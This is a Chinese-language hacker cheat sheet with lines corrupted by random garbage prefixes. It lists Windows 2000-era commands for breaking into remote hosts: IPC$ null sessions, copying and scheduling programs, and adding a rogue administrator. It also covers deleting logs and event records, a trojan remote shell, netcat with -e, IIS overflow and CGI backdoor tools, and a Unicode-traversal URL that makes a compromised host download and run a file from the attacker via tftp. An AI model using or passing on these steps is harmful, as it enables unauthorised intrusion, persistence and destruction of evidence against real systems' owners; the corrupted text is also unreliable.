网管和黑客都必须知道的命令
dQ6:c7hp>D 常用的几条NET命令:
?E1<>4S��8 2E��~�WcB (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
#<�pp�iu�$ r|$@Wsb�?# (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
n�o�Y~fq/U m~;�fklX S (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
tL0<xGI5^� qfp,�5�@p
(查看远程主机时间) net time \\IP地址
e~tgd8a2a� %lVc7L��2] (定时启动某个程序) at \\IP地址 02:18 readme.exe
4���W���7� i#�/,Q1yEn (查看共享) net view \\IP地址
2NS(;tBB0� Jt79�M(Hp! (查看netbios工作组列表) nbtstat -A IP地址
; MU8�@?yN �0zrgK�;9� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
DG&�
({v�y (X�tN3FTY� (这两条把自己增加到管理员组): net user 用户名 密码 /add
z%xWP&�3%" �IS *-ML�i net localgroup Administrators 用户名 /add
v�~|~&D�wq e~��#�;�ux (断开连接) net use \\IP地址\ipc$ /delete
&R�$6d�G�4 L� ]Ht��mI 扫尾:
1Rl�g�%�G' l ;�"�v&? del C:\winnt\system32\logfiles\*.*
@<�]s�W�*s KU,K��E�tf del C:\winnt\ssytem32\config\*.evt
v{%x�,K5�6 kTQ.7mo/\' del C:\winnt\system32\dtclog\*.*
USgZ�%x�k2 V�+���#�Sb del C:\winnt\system32\*.log
z�Ttn`�j�$ p��<b//^�� del C:\winnt\system32\*.txt
(,Zy�2wr=� y/}�[S@4uB del C:\winnt\*.txt
zrt�\]�h�+ o�+�UCu`7e del C:\winnt\*.log
C:S*j��u�K ��Or�e�>j+ 一、netsvc.exe
�wf�47Ul�x A�*�d Pw.� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
%UI�R ��GI r)Q/�YzXx* netsvc /list \\IP地址
~)5NX
�4Po 8<�BY�AHY^ netsvc schedule \\IP地址 /query
�2tz%A�~}4 p;;4b�@��� netsvc \\IP地址 schedule /start
WXJE��Aje� Lhg4fuos@) 二、OpenTelnet.exe
&P�Y�~m�<F �0$��RZ~�� 远程启动主机的Telnet服务,并绑定端口到7878,例如:
4n5�5{�?Z� 0ws1��S(pq OpenTelnet \\IP地址 用户名 密码 1 7878
kKbq�?}�W[ gc~n�T/lfK 然后就可以telnet到主机的7878端口,进入DOS方式下:
�Z��)
nB�� Ul"�9zT��H telnet IP地址 7878
50�,���`=Z [ .]�x���y 三、winshell.exe
5%H(Aa�G*q 0,1��x-
yD 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
HEqTl�nxUu {wU��b�r�^ p Path (查看winshell主程序的路径信息)
!O;�su~7�
bv %B�o4�s b reBoot (重新启动机器)
y�VF1�*#"� ~Mk{��2;�x d shutDown (关闭机器)
B4tC���3r� _�~�q!�<-Z s Shell (执行后你就会看到可爱的“C:\>”)
�.3xpDVW^e &BF97%�E2 x eXit (退出本次登录会话,此命令并不终止winshell的运行)
�M������:: kV���>�[$6 CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
X`-�7:� !+ ��p~(+�4uA 四、3389登陆器,GUI方式登录远程主机的
�m Acny$u UZ�csMM�KH 五、elsave.exe
2�o8:�[3C5 %S$P<nKN�5 事件日志清除工具
�is�U7nlc! � :�P,�g,� elsave -s \\IP地址 -l "application" -C
�L7�k�NQ/� �qp#Is�{=m elsave -s \\IP地址 -l "system" -C
h%�4aL38�� \!O3]�k,r� elsave -s \\IP地址 -l "security" -C
"�LwLTPC�2 '�6^�+|1�� 执行后成功清除应用程序日志,系统日志,安全日志
O|Sbe%[*wW KGM9��
�b� 六、hbulot.exe
ALc�in))+B +0,'B5 �(E 开启win2kserver和winxp的3389服务
�@;\�2� PD �.AB n$ml] hbulot [/r]
#}M\ J0Q�G IP?�1�5l w 使用/r表示安装完成后自动重起目标使设置生效。
kS�W=DE|#} L{�pz)')�I 七、nc.exe(netcat.exe)
F�~bD�A~�� v,T��:V#f^ 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
DIq�M\ �>< 9H��u;CKs 想要连接到某处: nc [-options] hostname port[s] [ports] ...
}I�}/�e
v� .[�8!��
E_ 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
�/,C;fT�<R �{oXU)9v�j 参数:
^$F�Nu~�|K s<z`�<^hRe -e prog 程序重定向,一旦连接,就执行 [危险!!]
�_ Ms�O2A 2/WtO�QI�B -g gateway source-routing hop point[s], up to 8
_\/K��I
�/ ��mS$9�D{� -G num source-routing pointer: 4, 8, 12, ...
W����dWMZh |Do+=Gr$t@ -h 帮助信息
<bSG|Vqn�H �)2�z<5 �` -i secs 延时的间隔
��$Cgl$A �H�ZASIsl� -l 监听模式,用于入站连接
�^�"dV�z.� I45 kP�fu -n 指定数字的IP地址,不能用hostname
�~^{>!wU+� }l>\�D�~:M -o file 记录16进制的传输
�pwF�+ZNo �^_4e^D]P" -p port 本地端口号
�/EIQMZuYp 64LX[8A�x# -r 任意指定本地及远程端口
��f�Mpx�e( }�4�uHT.)� -s addr 本地源地址
v��9,<2 <�USK6!�-G -u UDP模式
"U�"p�hLX� �l�r�*p\vH -v 详细输出——用两个-v可得到更详细的内容
1;*4y�J��2 �%�`�EyG�� -w secs timeout的时间
��^�4� MJ -���(dtAo6 -z 将输入输出关掉——用于扫描时
IZ/PZ"n_�( 八、TFTPD32.EXE
Gy�e84C2E= I`�~G�iz7@ 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
^A��Bt�g�# ]Cc�3}�+(s http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
]�8n*f�o2# ���.B+�Bl/ 然后可以直接令文件运行:
�qnu<"�$
� zAW+!��C. http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
H]P*!q�`Ko elqm�/�u�� 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
b�I�-uF8�" �AZ9;6D�f� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
CL��|d���> �> `�1K0?_ 一、一 Xscan命令行运行参数说明:
&%U�Z"CcA� ~�x�a y�Gk 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
1^�ijKn�@6 a�
Xn:hn~O 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
|Q(3rcOrV" pqCp>BO�?O xscan -file <主机列表文件名> <检测项目> [其他选项]
�+`�J~�c|( h]Y,gya[yk 其中<检测项目> 含义如下:
{e�+}jZ[�L `@�<~�VWe5 -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
dc� dVB>D &wX5��68o� -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
lt�{D��f~c \w�KnX]xGf -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
$�$�
9�!4� �&��A��t9@ -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
q)l1�t�C72 "X(�9�.6$_ -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
y$}o{�VE{x |2Y�/�l~� [其他选项] 含义如下:
Gw$Y`]i�py 4wk���mgS
-v: 显示详细扫描进度
A-e�R��L` !X5LgMw^�; -p: 跳过Ping不通的主机
aBd>.�]l�? u�}">�b+{! -o: 跳过没有检测到开放端口的主机
H %D�cp�#k 4Uk\h�gT0 -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
